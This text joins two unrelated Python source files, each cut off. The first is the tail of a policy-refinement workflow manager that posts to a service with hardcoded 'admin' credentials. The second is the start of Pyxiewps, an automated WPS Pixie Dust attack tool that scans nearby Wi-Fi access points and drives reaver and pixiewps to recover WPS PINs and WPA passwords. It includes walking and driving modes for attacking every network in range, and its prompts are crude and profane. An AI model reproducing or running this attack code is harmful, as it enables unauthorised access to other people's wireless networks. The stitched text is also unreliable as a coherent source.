output += " <tns:dst_Service>" + "id" + str(i + 1) + "</tns:dst_Service>"
output += " <tns:networkFields/>"
output += "</tns:edge>"
i = i + 1
if max_number==1:
output += "<tns:edge>"
output += "<tns:src_Service>" + "id0</tns:src_Service>"
output += "<tns:dst_Service>" + "id0</tns:dst_Service>"
output += "<tns:networkFields/>"
output += "</tns:edge>"
output = output + " </tns:service_graph></tns:Mapping>"
print output
return output
def convert_GGUI_syntax_to_HSPL(self, hspljson):
"""
The GUI used to define policies currently has a limitation where
it does not produce proper well-formed XML according to the HSPL
schema. This function tries to sanitise the GUI representation and
produce a valid XML version.
"""
output = """<?xml version='1.0' encoding='UTF-8'?>
<tns:Mapping xmlns:tns='http://www.example.org/Refinement_Schema'
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
xsi:schemaLocation=
'http://www.example.org/Refinement_Schema Refinement_Schema.xsd '>"""
output += "<tns:hspl_list>"
i = 0
while (i < len(hspljson)):
output += "<tns:hspl subject='" + str(hspljson[i]['target']) + "' id='hspl" + str(hspljson[i]['id']) + "'>"
pieces = str(hspljson[i]['hspl']).split(';')
action = pieces[1]
obj = pieces[2]
self.dbprint(obj)
# BEGIN HACKS
obj = obj.replace("Internet traffic", "Internet_traffic")
obj = obj.replace("intranet traffic", "Intranet_traffic")
action = action.replace("is/are authorized to access", "authorise_access")
action = action.replace("is/are not authorized to access", "no_authorise_access")
action = action.replace("reduce(s)", "reduce")
action = action.replace("remove(s)", "remove")
action = action.replace("protect(s) confidentiality", "prot_conf")
# END HACKS
output += "<tns:action>" + str(action) + "</tns:action>"
output += "<tns:objectH>" + str(obj) + "</tns:objectH>"
output += "<tns:fields"
time_list = []
url_list = []
target_list = []
content_list = []
purpose_list = []
resource_list = []
up_bandwidth_list = []
dl_bandwidth_list = []
country_list = []
if (len(pieces) > 3):
j = 3
while (j < len(pieces)):
print "Going through all the fields"
field = str(pieces[j])
field = field.translate(None, "()")
# self.dbprint( field
data = field.split(",")
k = 0
while k < (len(data) - 1):
if data[k] == "time_period":
time_list.append(data[k + 1])
elif data[k] == "specific_URL":
url_list.append(data[k + 1])
elif data[k] == "traffic_target":
target_list.append(data[k + 1])
elif data[k] == "type_Content":
content_list.append(data[k + 1])
elif data[k] == "purpose":
purpose_list.append(data[k + 1])
elif data[k] == "resource_values":
resource_list.append(data[k + 1])
elif data[k] == "uplink_bandwidth_value":
up_bandwidth_list.append(data[k + 1])
elif data[k] == "downlink_bandwidth_value":
dl_bandwidth_list.append(data[k + 1])
elif data[k] == "country":
country_list.append(data[k + 1])
else:
pass
k = k + 1
j = j + 1
if len(dl_bandwidth_list) > 0 or len(up_bandwidth_list) > 0:
output += " "
for v in dl_bandwidth_list:
output += " downlink_bandwidth_value="
output += "\"" + str(v) + "\""
for v in up_bandwidth_list:
output += " uplink_bandwidth_value="
output += "\"" + str(v) + "\""
if len(country_list) > 0:
for v in country_list:
output += " country='" + str(v) + "'"
output += ">"
if len(time_list) > 0:
output += "<tns:time_period time-zone='UTC'>"
for v in time_list:
output += "<tns:interval_time><tns:time_hours start-time='"
times = v.split("-")
firstTime = times[0]
secondTime = times[1]
output += str(firstTime) + ":00' end-time='"
output += str(secondTime) + ":00' />"
output += "</tns:interval_time>"
output += "</tns:time_period>"
if len(url_list) > 0:
output += "<tns:specific_URL>"
for v in url_list:
output += "<tns:URL>"
output += str(v)
output += "</tns:URL>"
output += "</tns:specific_URL>"
if len(target_list) > 0:
output += "<tns:traffic_target>"
for v in target_list:
output += "<tns:target_name>"
output += str(v)
output += "</tns:target_name>"
output += "</tns:traffic_target>"
if len(content_list) > 0:
output += "<tns:type_content>"
for v in content_list:
output += "<tns:content_name>"
output += str(v)
output += "</tns:content_name>"
output += "</tns:type_content>"
if len(purpose_list) > 0:
output += "<tns:purpose>"
for v in purpose_list:
output += "<tns:purpose_name>"
output += str(v)
output += "</tns:purpose_name>"
output += "</tns:purpose>"
if len(resource_list) > 0:
output += "<tns:resource_values>"
for v in url_list:
output += "<tns:name_resurces>"
output += str(v)
output += "</tns:name_resurces>"
output += "</tns:resource_values>"
output += "</tns:fields>"
output += "</tns:hspl>"
i = i + 1
output += "</tns:hspl_list> </tns:Mapping>"
f = open("hspl.xml", "w")
f.write(output)
f.write("\n")
f.close()
print "Converted HSPL"
return output
# On failure, returns None
# On success, returns a tuple of the Application Graph in XML format + the list of MSPLs
def H2M(self, user, password, upr_url, spm_url, psar_url, editor_id=None):
# Delete old data
self.delete_ag(user, editor_id, password, upr_url)
print "Username is " + str(user) + ". Editor is " + str(editor_id)
upr = upr_client.UPRClient(str(upr_url))
cred = upr.auth_user(user, password)
if cred.status_code != 200:
self.dbprint("unauthorised")
else:
self.dbprint("successful authentication")
if editor_id == None:
editor_id = user
r = upr.get_user_list(user_id=user)
if r.status_code != 200:
self.dbprint("error getting user list")
else:
print "Username is " + user + " " + str(r.text)
data = r.json()
if data['creator'] != None:
self.dbprint("Creator: " + str(data['creator']))
# editor_id = data['creator']
else:
self.dbprint("User has no parent creator")
r = upr.get_user_type(user_id=user)
if r.status_code == 404:
self.dbprint("error getting user type")
else:
data = r.json()
usertype = data['type']
self.dbprint("User type: " + usertype)
# If normal user, delete all MSPLs
if usertype == "normal":
self.delete_all_mspl(user, password, upr_url, editor_id)
r = upr.get_user_opt_profile(user)
if r.status_code != 200:
self.dbprint("error could not find optimisation profile")
data = r.json()
opt_profile = data['optimization_profile']
self.dbprint("Optimisation profile: " + str(opt_profile))
# This is a hack, will clean later.
if True:
r = upr.get_user_list(user_id=user)
if r.status_code != 200:
raise Exception("UPR error code " + str(r.status_code))
data = r.json()
admin = data['is_admin']
if (admin == True):
print str(user) + " is an admin"
print "Getting created users"
r = upr.get_created_users(user)
if r.status_code == 200:
data = r.json()
users = data['users']
print str(user) + " has created " + str(len(users)) + " users"
# For every user that the admin has created...
token = ""
for child in users:
print "Running workflow manager for " + str(child)
print "Just about to run nested WFM...current user is " + str(user)
wfm = workflow_manager.WorkflowManager(child, token, upr_url, spm_url, psar_url)
else:
print colored(
"ERROR getting created users for " + str(user) + " with UPR status" + str(
r.status_code))
else:
print str(user) + " is NOT an admin"
if editor_id == None or editor_id == user:
editor_id = user
print str(user) + ": I AM MYSELF"
r = upr.get_hspl(target=user, editor=editor_id)
if r.status_code != 200:
self.dbprint("something went wrong when getting the HSPL: HTTP " + str(r.status_code))
else:
new = json.loads(json.dumps(r.json()))
self.dbprint(r.json())
if len(new) == 0:
print "No HSPLS"
if usertype != "expert":
self.dbprint(colored("ERROR: No HSPLs found for this user", 'red'))
return None
self.dbprint("Converting HSPL")
hspl_list_xml = self.convert_GGUI_syntax_to_HSPL(r.json())
self.dbprint(hspl_list_xml)
self.validate_hspl(hspl_list_xml)
market_psa_list_xml = self.get_market_psa_xml(user, psar_url)
print str(market_psa_list_xml)
r = upr.get_user_psa(user, is_active=True)
h2m_input = ""
subject_xml = self.get_subject_xml_file(upr_url)
f = open('xmlSchema/Target_Review.xml', 'r')
target_xml = f.read()
f.close()
f = open('xmlSchema/Content_Review.xml', 'r')
content_xml = f.read()
f.close()
user_sg = None
psa_xml = None
active_psa_list_xml = ""
# TODO: Below is for the expert user, call convertPSAlist for normal user
if usertype == "expert":
r = upr.get_user_mspl_psa(user)
mspl_psa_assoc = r.json()
r = upr.get_user_psa(user, is_active=True)
market_psa_list_json = r.json()
print "Converting SG for expert"
user_sg = self.convertSG(market_psa_list_json, mspl_psa_assoc, psar_url)
psa_xml = market_psa_list_json
else:
user_sg = self.convertPSAlist_normal(user, upr_url, psar_url)
psa_xml = user_sg
active_psa_list_xml = psa_xml
# Force this optimisation for all users
opt_profile = "MIN_BUY_COSTMAX_RATING"
# Decoded version for debugging
h2m_input = self.collectInput("POLICY_HSPL", hspl_list_xml, user_sg, market_psa_list_xml,
market_psa_list_xml, subject_xml, content_xml, target_xml,
opt_profile, "0")
f = open('h2m_input_decoded.json', 'w')
debug = f.write(h2m_input)
f.close()
# Base64 encoding # comment these to disable base64
hspl_list_xml = base64.b64encode(hspl_list_xml)
user_sg = base64.b64encode(user_sg) # Expert/enthusiastic user
psa_xml = base64.b64encode(str(psa_xml))
active_psa_list_xml = base64.b64encode(active_psa_list_xml)
market_psa_list_xml = base64.b64encode(market_psa_list_xml)
subject_xml = base64.b64encode(subject_xml)
content_xml = base64.b64encode(content_xml)
target_xml = base64.b64encode(target_xml)
if usertype == "normal":
h2m_input = self.collectInput("POLICY_HSPL", hspl_list_xml, user_sg, psa_xml,
market_psa_list_xml, subject_xml, content_xml, target_xml,
opt_profile, "0")
if usertype == "expert":
r = upr.get_mspl(target=str(user), editor=str(editor_id))
if r.status_code != 200:
print "ERROR: Could not retrieve MSPLs for expert user " + str(user) + " with error " + str(r.status_code)
return None
# At this point, the MSPLs should already be in base64 format?
mspl_list_xml = []
mspl_list_json = r.json()
concat_mspl = ""
print str(r.json())
howmany = json.loads(json.dumps(r.json()))
if len(howmany) == 0:
print "ERROR: No MSPLs available for th expert user: " + str(user)
return None
for mspl in mspl_list_json:
print "Getting MSPL policy..."
mspl_list_xml.append(mspl['mspl'])
concat_mspl = concat_mspl + base64.b64decode(mspl['mspl'])
print "Performing for expert..."
#print "\n\n"
#print str(concat_mspl)
#print "\n\n"
concat_mspl = base64.b64encode(concat_mspl)
h2m_input = self.collectInput("APPLICATION_MSPL_SG", concat_mspl, user_sg, market_psa_list_xml,
market_psa_list_xml, subject_xml, content_xml, target_xml,
opt_profile, "0")
print "Contacting the SPM H2M service"
f = open("h2m_input.json", "w")
f.write(h2m_input)
f.close()
headers = {'content-type': 'application/json'}
counter = 0
print "Calling H2M"
while counter < 3:
try:
r = requests.post("http://" + spm_url + \
":8181/restconf/operations/h2mservice:h2mrefinement",
auth=('admin', 'admin'), headers=headers,
data=h2m_input, timeout=None)
break
except Exception:
counter = counter + 1
if counter < 3:
continue
self.dbprint("Connection to server timed out...")
sleep(1)
self.dbprint("Retrying...")
return None
self.dbprint(r.status_code)
print "SPM replied with " + str(r.status_code)
if r.status_code == 200:
data = r.json()
application_graph = base64.b64decode(data['output']['application_graph'])
try:
problem = data['output']['remediation']
self.dbprint("Policies need reconciliation")
self.dbprint("SPM returned " + str(r.json()))
is_reconciled = False
b64_mspl_list = []
ag = ""
# If policies are not enforceable, abort and back away very slowly...
try:
b64mspl_list = data['output']['MSPL']
ag = data['output']['application_graph']
except KeyError:
print colored("POLICY NOT ENFORCEABLE", 'red')
return None
self.dbprint("There are " + str(len(b64mspl_list)) + " MSPLs")
for mspl in b64mspl_list:
capability = self.get_capability_from_mspl(base64.b64decode(mspl))
print "CAPABILITY IS " + str(capability)
r = upr.create_mspl(user, editor_id, capability, is_reconciled, mspl)
print "Uploading unreconciled MSPLs"
if r.status_code != 201:
self.dbprint(" Error storing MSPL set in UPR with error code " + \
+ str(r.status_code))
else:
self.dbprint(" Successfully stored MSPL set in UPR")
self.dbprint(" Policies of " + str(user) + " still require reconciliaton")
r = upr.post_ag(user, editor_id, ag)
if r.status_code != 201:
print colored("UPR returned error code when storing AG: " + str(r.status_code), 'red')
else:
print colored("Successfully stored user AG in UPR", 'green')
'''
# TODO: Need to store MSPL-PSA associations
# psa_id = get_psa_assoc(mspl)
if (psa_id != None):
# TODO: FINISH T HIS BIT
#r = post_mspl_psa_assoc()
if r.status_code != 201:
print "COULD NOT CREATE USER-MSPL-PSA assoc!!!!!"
else:
self.dbprint(" Stored user-mspl-psa association")
'''
return None
except KeyError:
pass
b64mspl_list = data['output']['MSPL']
ag = data['output']['application_graph']
# Store resulting MSPL set and AG in the UPR
self.dbprint("There are " + str(len(b64mspl_list)) + " MSPLs")
mspl_list = []
for mspl in b64mspl_list:
raw_mspl = base64.b64decode(mspl)
mspl_list.append(raw_mspl)
# Store MSPL in UPR.
# TODO: store capability in capability field for expert users
is_reconciled = False
capability = self.get_capability_from_mspl(base64.b64decode(mspl))
r = upr.create_mspl(user, editor_id, capability, is_reconciled, mspl)
if r.status_code != 201:
self.dbprint(" Error creating MSPL with code " + str(r.status_code))
else:
self.dbprint(
colored(" Successfully stored MSPL in UPR: response " + str(r.status_code),
'green'))
r = upr.post_ag(user, editor_id, ag)
if r.status_code != 201:
print colored("UPR returned error code when storing AG: " + str(r.status_code), 'red')
else:
print colored("Successfully stored user AG in UPR", 'green')
# TODO: perhaps need to store each MSPL in the UPR
return (application_graph, mspl_list, editor_id)
else:
print("Error in H2M service response: " + str(r.text))
self.dbprint("\nIf you see the above, copy and paste to Fulvio Valenza and Marco")
return None
else:
self.dbprint("ERROR: unsupported user")
return None
def delete_ag(self, user, editor_id, password, upr_url):
upr = upr_client.UPRClient(str(upr_url))
r = upr.delete_user_ag(user, editor_id)
print "Deleting AG from UPR...status code " + str(r.status_code)
return r
def delete_all_mspl(self, user, password, upr_url, editor_id):
upr = upr_client.UPRClient(str(upr_url))
if (editor_id == None):
r = upr.get_mspl(target=user, editor=user)
else:
r = upr.get_mspl(target=user, editor=editor_id)
if r.status_code != 200:
raise Exception("WFM could not delete MSPL policies from the UPR " + str(r.status_code))
data = r.json()
for mspl in data:
try:
mspl_id = mspl['mspl_id']
r = upr.delete_mspl(mspl_id)
if r.status_code != 204:
print colored("Could not delete MSPL??? ERROR code from UPR: " + str(r.status_code), 'red')
except KeyError:
print "No MSPL ID? Show the following to Adrian: " + str(r.json())
def __init__(self, user, password, upr_url, spm_url, psar_url, set_debug=False, editor_id=None):
self.dbprint("Contacting UPR")
if editor_id == None:
upr = upr_client.UPRClient(str(upr_url))
r = upr.get_user_creator(user)
if r.status_code == 200:
data = r.json()
creator = data['creator']
if creator != None:
wfm = workflow_manager.WorkflowManager(user, password, upr_url, spm_url, psar_url,
editor_id=creator)
if set_debug == True:
self.DEBUG = True
mspl_list_xml = None
mspl_list_xml = WorkflowManager.H2M(self, user, password, upr_url, spm_url, psar_url, editor_id)
#print "Fatal error during workflow manager"
if (mspl_list_xml) is None:
self.dbprint("ERROR: This is the end. My only friend, the end.")
return None
else:
if (len(mspl_list_xml) > 1):
self.dbprint("H2M Workflow finished")
else:
self.dbprint("ERROR: No application graph?")
return None
# Checks to see if the HSPL is valid according to the SECURED HSPL schema
def validate_hspl(self, hspl_list_xml):
"""
:param hspl_list_xml: The XML of HSPLs
"""
try:
xsd_file = 'xmlSchema/hspl.xsd'
schema = etree.XMLSchema(file=xsd_file)
parser = objectify.makeparser(schema=schema)
objectify.fromstring(hspl_list_xml, parser)
self.dbprint(("YEAH!, my xml file has validated"))
except XMLSyntaxError:
self.dbprint("Oh NO!, the GUI HSPL does not validate")
self.dbprint(
"""To debug, use: xmllint --format --pretty 1 --load-trace --debug --schema hspl.xsd hspl.xml""")
self.dbprint(
"\nIt might still work with the SPM. But beware, there be dragons. Bad things may happen!")
def main(argv):
args = argv
debug = None
for a in args:
if a == "--debug":
debug = True
args.remove('--debug')
if len(args) != 6:
print("Usage: workflow-manager.py <username> <password> <upr_address> <spm_address> <psar_url>")
print("Optional flags:\n --debug : Shows more detailed output")
print("\nMy job is turn HSPL into LSPL, just like water into wine")
else:
script, user, password, upr_url, spm_url, psar_url = args
print "Starting"
wfm = workflow_manager.WorkflowManager(user, password, upr_url, spm_url, psar_url, set_debug=debug)
if __name__ == '__main__':
main(argv)
|
|
from os import kill, system, path, chdir
from signal import alarm, signal, SIGALRM, SIGKILL
import time
import subprocess
from re import sub, compile, search
from sys import argv
import datetime
import urllib
REAVER = 'reaver'
PIXIEWPS = 'pixiewps'
AIRMON = 'airmon-ng'
GIT = 'git'
INFO = '\033[32m[+] \033[0m' # green
ALERT = '\033[31m[!] \033[0m' # red
INPUT = '\033[34m[>] \033[0m' # blue
DATA = '\033[33m[DATA] \033[0m' #yellow
OPTION = '\033[33m[!!!] \033[0m' #yellow
SEPARATOR = '*'*70+'\n'
USE_PIXIEWPS = False # Tries to get the WPS pin with pixiewps
AIRODUMP_TIME = 3 # Airodump spends this amount of time enumerating APs
RSSI = -100 # RSSI
CHANNEL = '' # All
REAVER_TIME = 6 # Time to get all the useful AP information with reaver
CHOICES_YES = ['Y', 'y', '', 'yes', 'YES', 'Yeah.. whatever...']
CHOICES_NOPE = ['N', 'n', 'no', 'No', 'Dude... I mean... NO! GTFO!'] # Tits or GTFO
blacklist = [] # BSSID blacklist of failed attacks
PROMPT_APS = False
OUTPUT = False
OUTPUT_FILE = 'data.txt'
PRINT_REAVER = True
PRINT_PIXIE = True
GET_PASSWORD = False
FOREVER = False
OVERRIDE = True
BLACKLIST = True
MAX_APS = 'All'
USE_MODES = False
def banner():
"""
Prints the banner into the screen
"""
print
print "\t ____ _ "
print "\t| _ \ _ ___ _(_) _____ ___ __ ___ "
print "\t| |_) | | | \ \/ / |/ _ \ \ /\ / / '_ \/ __|"
print "\t| __/| |_| |> <| | __/\ V V /| |_) \__ \\"
print "\t|_| \__, /_/\_\_|\___| \_/\_/ | .__/|___\\"
print "\t |___/ |_| "
print
print "\tPyxiewps v1.2 by jgilhutton <[email protected]>"
print "\tReaver 1.5.2 mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg"
print "\t Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>"
print "\tPixiewps Copyright (c) 2015, wiire <[email protected]>"
print "\tAircrack www.aircrack-ng.org"
print
def arg_parser():
"""
Parses the arguments and calls the help() function if any problem is found
"""
global PRINT_PIXIE
global PRINT_REAVER
global USE_PIXIEWPS
global AIRODUMP_TIME
global REAVER_TIME
global CHANNEL
global PROMPT_APS
global OUTPUT_FILE
global OUTPUT
global GET_PASSWORD
global FOREVER
global OVERRIDE
global BLACKLIST
global RSSI
global MAX_APS
global USE_MODES
H = ['-h','--help']
flags = ['-p','-P','-f','-q','-F','-A']
binary_flags = ['-a','-t','-c','-o','-s','-m','-M',
'--max-aps','--rssi','--airodump-time','--time','--channel','--output','--mode']
for arg in argv[1:]:
if arg in H:
help()
exit()
elif argv[argv.index(arg)-1] in binary_flags:
continue
elif arg == '-m' or arg == '--mode':
USE_MODES = True
mode = argv[argv.index(arg)+1]
if mode == 'WALK':
USE_PIXIEWPS = True
AIRODUMP_TIME = 4
REAVER_TIME = 8
GET_PASSWORD = True
FOREVER = True
MAX_APS = 2
elif mode == 'DRIVE':
USE_PIXIEWPS = True
REAVER_TIME = 10
FOREVER = True
MAX_APS = 1
elif mode == 'STATIC':
USE_PIXIEWPS = True
AIRODUMP_TIME = 5
REAVER_TIME = 10
GET_PASSWORD = True
PROMPT_APS = True
OVERRIDE = False
else:
print ALERT + "WTF does %s mean?" %mode
print " Check available modes in the help."
print " But I know you are a lazy fuck, so here's the help for you..."
help()
elif arg == '-M' or arg == '--max-aps':
try:
MAX_APS == int(argv[argv.index(arg)+1])
except ValueError:
help()
elif arg == '-s' or arg == '--rssi':
try:
RSSI = int(argv[argv.index(arg)+1])
if RSSI < -100 or RSSI > 0: help()
except ValueError:
help()
elif arg == '-q' or arg == '--quiet':
PRINT_PIXIE = False
PRINT_REAVER = False
elif arg == '-p' or arg == '--use-pixie':
USE_PIXIEWPS = True
elif arg == '-a' or arg == '--airodump-time':
try:
AIRODUMP_TIME = int(argv[argv.index(arg)+1])
if REAVER_TIME <= 0: help()
except ValueError:
help()
elif arg == '-t' or arg == '--time':
try:
REAVER_TIME = int(argv[argv.index(arg)+1])
if REAVER_TIME <= 0: help()
except ValueError:
help()
elif arg == '-c' or arg == '--channel':
try:
CHANNEL = int(argv[argv.index(arg)+1])
if CHANNEL <= 0 or CHANNEL >= 15: help()
except ValueError:
help()
elif arg == '-P' or arg == '--prompt':
PROMPT_APS = True
elif arg == '-o' or arg == '--output':
OUTPUT = True
try:
m = argv[argv.index(arg)+1]
if m not in flags:
if m not in binary_flags: OUTPUT_FILE = m
except IndexError:
pass
elif arg == '-f' or arg == '--pass':
GET_PASSWORD = True
elif arg == '-F' or arg == '--forever':
FOREVER = True
elif arg == '-A' or arg == '--again':
OVERRIDE = False
BLACKLIST = False
else:
help()
if CHANNEL != '':
AIRODUMP_TIME = 1
def help():
"""
Help information
"""
print
print ' Examples:'
print
print "\tpyxiewps -p -t 6 -c 7 -P -o file.txt -f"
print "\tpyxiewps --use-pixie --time 6 --channel 7 --prompt --output file.txt"
print "\tpyxiewps -m STATIC"
print "\tpyxiewps --mode DRIVE"
print
print ' Individual options:'
print
print '\t-p --use-pixie Once all the data is captured with reaver [False]'
print '\t the script tries to get the WPS pin with pixiewps.'
print '\t-a --airodump-time [time] Airodump spends this amount of time enumerating APs [3]'
print '\t-t --time [time] Set the time used to get the hex data from the AP. [6]'
print '\t-c --channel [channel] Set the listening channel to enumerate the WPS-active APs.'
print '\t If not set, all channels are listened.'
print '\t-P --prompt If more than one WPS-active AP is found, ask the user [False]'
print '\t the target to attack.'
print '\t-o --output [file] Outputs all the data into a file.'
print '\t-f --pass If the WPS pin is found, the script uses reaver again to retrieve'
print '\t the WPA password of the AP.'
print '\t-q --quiet Doesn\'t print the AP information. Will print the WPS pin and pass if found.'
print '\t-F --forever Runs the program on a While loop so the user can scan and attack a hole'
print '\t zone without having to execute the program over and over again.'
print '\t-A --again Target is attacked again in case of success without prompting the user.'
print '\t-s --signal [-NUMBER] APs with RSSI lower than NUMBER will be ignored [-100]'
print '\t A value of "-50" will ignore APs with RSSI between'
print '\t -100 and -51 and will attack APs which RSSI goes from -50 to 0'
print '\t-M --max-aps [number] Max amount of APs to be attacked.'
print '\t-m --mode [mode] Set the mode preset. Any preset option can be override'
print '\t by giving its argument and value on the commandline.'
print '\t i.e: "-m DRIVE -t 10"'
print
print ' Available modes:'
print
print '\tWALK:'
print '\t\t[-p] [-f] [-a 4] [-t 8] [-F] [-M 2]'
print '\t\tTries to get the WPS pin'
print '\t\t4 seconds will be used to enumerate the APs'
print '\t\t8 seconds will be used to fetch the AP information'
print '\t\tWill try to get the password'
print '\t\tThe program will run in a while loop.'
print '\t\tA max amount of 2 APs will be attacked'
print '\t\tAP won\'t be atacked again if failed once'
print '\tDRIVE:'
print '\t\t[-p] [-t 10] [-F] [-M 1]'
print '\t\tTries to get the WPS pin'
print '\t\t3 seconds will be used to enumerate the APs'
print '\t\t10 seconds will be used to fetch the AP information'
print '\t\tWon\'t try to get the password'
print '\t\tThe program will run in a while loop.'
print '\t\tOnly one AP will be attacked'
print '\t\tAP won\'t be atacked again if failed once'
print '\tSTATIC:'
print '\t\t[-p] [-f] [-a 5] [-t 10] [-P] [-O]'
print '\t\tTries to get the WPS pin'
print '\t\t5 seconds will be used to enumerate the APs'
print '\t\t10 seconds will be used to fetch the AP information'
print '\t\tWill try to get the password'
print '\t\tThe program will run only once'
print '\t\tUser will be prompted for an AP to attack'
print '\t\tAP will be atacked again if failed once'
exit()
class Engine():
"""
Manage the Config functions and start the program
"""
def __init__(self):
self.REAVER = True
self.PIXIEWPS = True
self.AIRMON = True
self.GIT = True
def start(self):
"""
Main function
"""
chdir('/root/')
if not c.check_iface(): # check_iface returns True if any previous wlan is found in monitor mode
c.set_iface("UP")
else:
print INFO + "Previous interface was found in NSA mode: %s" %c.IFACE_MON
choice = raw_input("%sDo you wish to use this interface? [Y/n] " %INPUT)
print
if choice in CHOICES_YES:
print INFO + "Good fucking choice..."
print
pass
elif choice in CHOICES_NOPE:
c.set_iface("DOWN")
c.set_iface("UP")
print INFO + "It's on! Bitches..."
while True:
attack = Attack()
attack.get_wps_aps()
if not FOREVER:
engine.exit_clean()
def parse_reaver(self, output, pin_found = False):
"""
Parses the reaver output
Gets the pkr, pke, hash1 y 2, enonce, rnonce, authkey, manufacturer y model
and returns all the data
"""
if pin_found:
password = ''
for line in output:
if '[+] WPA PSK: ' in line:
password = sub('\[\+\] WPA PSK: ','',line)
return password
if password == '':
return 'no password'
E_NONCE = ''
R_NONCE = ''
PKR = ''
PKE = ''
HASH1 = ''
HASH2 = ''
AUTHKEY = ''
MANUFACTURER = ''
MODEL = ''
NUMBER = ''
uberlist = []
final_list = []
is_complete = False
has_something = False
if output == '':
return 'shit'
for line in output:
if 'E-Nonce' in line:
has_something = True
elif 'E-Hash2' in line:
final_list = output[0:output.index(line)+1] # Truncates the output after the hash2 is found
is_complete = True
break
elif 'Detected AP rate limiting' in line:
return 'ap rate limited'
if has_something and not is_complete:
return 'more time please'
elif has_something == False:
return 'noutput'
for line in final_list:
if 'E-Nonce' in line:
E_NONCE = sub('\[P\] E-Nonce: ','',line)
elif 'R-Nonce' in line:
R_NONCE = sub('\[P\] R-Nonce: ','',line)
elif 'PKR' in line:
PKR = sub('\[P\] PKR: ','',line)
elif 'PKE' in line:
PKE = sub('\[P\] PKE: ','',line)
elif 'E-Hash1' in line:
HASH1 = sub('\[P\] E-Hash1: ','',line)
elif 'E-Hash2' in line:
HASH2 = sub('\[P\] E-Hash2: ','',line)
elif 'AuthKey' in line:
AUTHKEY = sub('\[P\] AuthKey: ','',line)
elif 'Manufacturer' in line:
MANUFACTURER = sub('\[P\] WPS Manufacturer: ','',line)
elif 'Model Name' in line:
MODEL = sub('\[P\] WPS Model Name: ','',line)
elif 'Model Number' in line:
NUMBER = sub('\[P\] WPS Model Number: ','',line)
elif '[+] Associated with ' in line:
ESSID = sub('\(ESSID\: ','|',line)
ESSID = ESSID.split('|')[-1][:-2]
elif '[+] Waiting for beacon from ' in line:
BSSID = sub('\[\+\] Waiting for beacon from ','',line)
uberlist = [PKE.strip(),PKR.strip(),HASH1.strip(),HASH2.strip(),AUTHKEY.strip(),
MANUFACTURER.strip(),MODEL.strip(),NUMBER.strip(),E_NONCE.strip(),R_NONCE.strip(),
ESSID.strip(),BSSID.strip()]
return uberlist
def parse_airodump(self, input):
"""
Parses the airodump output
If you find some error in the program flow, check this function first.
returns ESSIDs, WPSstatus, channel, bssid and RSSI
"""
plist = []
input.reverse() # Important
inds = [47,73,86] # CHANNEL, WPS, ESSID indexes
if CHANNEL != '': inds = [i+4 for i in inds]
for line in input: # Skip all the clients on the output
if 'Probe' in line: #
input = input[(input.index(line)+1):] # Uses the 'Probe' keyword
break #
for i in input:
if "][ Elapsed:" not in i and ":" in i and "<length:" not in i:
i = i.lstrip().strip()
snowden = i[inds[1]:] # I ran out of names
try:
wps = snowden[0:snowden.index(' ')].strip()
essid = snowden[(snowden.index(' ')+2):].lstrip()
except (IndexError, ValueError): # hence ' '
continue
channel = i[inds[0]:inds[0]+2].lstrip()
bssid = i[0:17]
rssi = i[19:22]
try:
if bssid not in blacklist and wps != '' and '0.0' not in wps and int(rssi) >= RSSI:
a = '%s|%s|%s|%s|%s|%s' %(bssid,channel.zfill(2),rssi,wps,wps,essid)
plist.append(a)
except ValueError:
print ALERT + "There was a parsing error in parse_airodump function."
except:
return plist
elif "][ Elapsed:" in i:
break
plist.sort(key=lambda x: int(x[21:24]), reverse = True) # Sorts the list by RSSI
if MAX_APS != 'All':
try:
return plist[0:MAX_APS]
except IndexError:
return plist
if MAX_APS == 'All': # For the sake of readability
return plist
def check(self, check_again = False):
"""
Check dependencies, user ID and other stuff
"""
if c.get_uid() != '0':
print ALERT + 'ROOT motherfucker! Do you speak it?'
exit()
size = c.screen_size()
if size < 110:
print
print ALERT + "What is this? A terminal for ants?"
print " Please, increase the window size and run the program again."
print
exit()
### Programs
if c.program_exists(REAVER):
version = c.check_reaver_version()
if version == '1.5.2':
self.REAVER = True
else:
print ALERT + "You need other version of reaver."
self.REAVER = False
elif not check_again:
print ALERT + 'reaver is not in da house.'
self.REAVER = False
if c.program_exists(PIXIEWPS):
self.PIXIEWPS = True
elif not check_again:
print ALERT + 'pixiewps is not in da fucking hose'
self.PIXIEWPS = False
if c.program_exists(AIRMON):
self.AIRMON = True
elif not check_again:
print ALERT + 'airmon-ng is not in da motherfuckin house'
self.AIRMON = False
if c.program_exists(GIT):
self.GIT = True
elif not check_again:
self.GIT = False
if self.REAVER and self.AIRMON and self.PIXIEWPS and check_again:
print INFO + "All programs are now in da house."
raw_input("%sPress enter to continue" %INPUT)
print
print INFO + "Starting the attack..."
elif check_again:
print
print ALERT + "SAaw... shit. Some programs were not installed."
print " manually check the needed dependencies"
print " and run again after you installed them."
print
exit()
if not (self.REAVER and self.AIRMON and self.PIXIEWPS):
print ALERT + "You need to install some programs."
print INPUT + "The dependencies are:"
print "\tbuild-essential"
print "\tlibpcap-dev"
print "\tsqlite3"
print "\tlibsqlite3-dev"
print "\taircrack-ng"
print "\tlibssl-dev"
choice = raw_input("%sDo you wish to install them now? I dare you... I double dare you... [Y/n]" %INPUT)
if choice in CHOICES_YES:
c.get_binaries()
else:
exit()
version = subprocess.Popen('airodump-ng --help | grep wps', shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
version1 = version.communicate()[0]
if '--wps' not in version1:
print
print ALERT + "Incorrect version of Aircrack on your repositories."
print " Do you want to download source code and compile it?"
print " (The program will try to compile it but the process may take a while)"
print
choice = raw_input(INPUT+"[Y/n] ")
if choice in CHOICES_YES:
c.get_binaries(compileAircrack = True)
else:
self.exit_clean()
###All good...
engine.start()
def run(self, cmd, shell = False, kill_tree = True, timeout = -1, airodump = False):
"""
Runs a command witha given time after wich is terminated
returns stdout of proc.
output is a list without passing strip() on the lines.
"""
class Alarm(Exception):
pass
def alarm_handler(signum, frame):
raise Alarm
output = []
if timeout != -1:
signal(SIGALRM, alarm_handler) # Time's ticking...
alarm(timeout)
if airodump:
proc = subprocess.Popen(cmd, shell = shell, stderr = subprocess.PIPE)
else:
proc = subprocess.Popen(cmd, shell = shell, stdout = subprocess.PIPE)
try:
if airodump:
for line in iter(proc.stderr.readline, ''):
output.append(line)
if timeout != -1:
alarm(0)
else:
for line in iter(proc.stdout.readline, ''):
output.append(line)
if timeout != -1:
alarm(0)
except Alarm: # time's out! alarm is raised
pids = [proc.pid] # kill the process tree related with the main process.
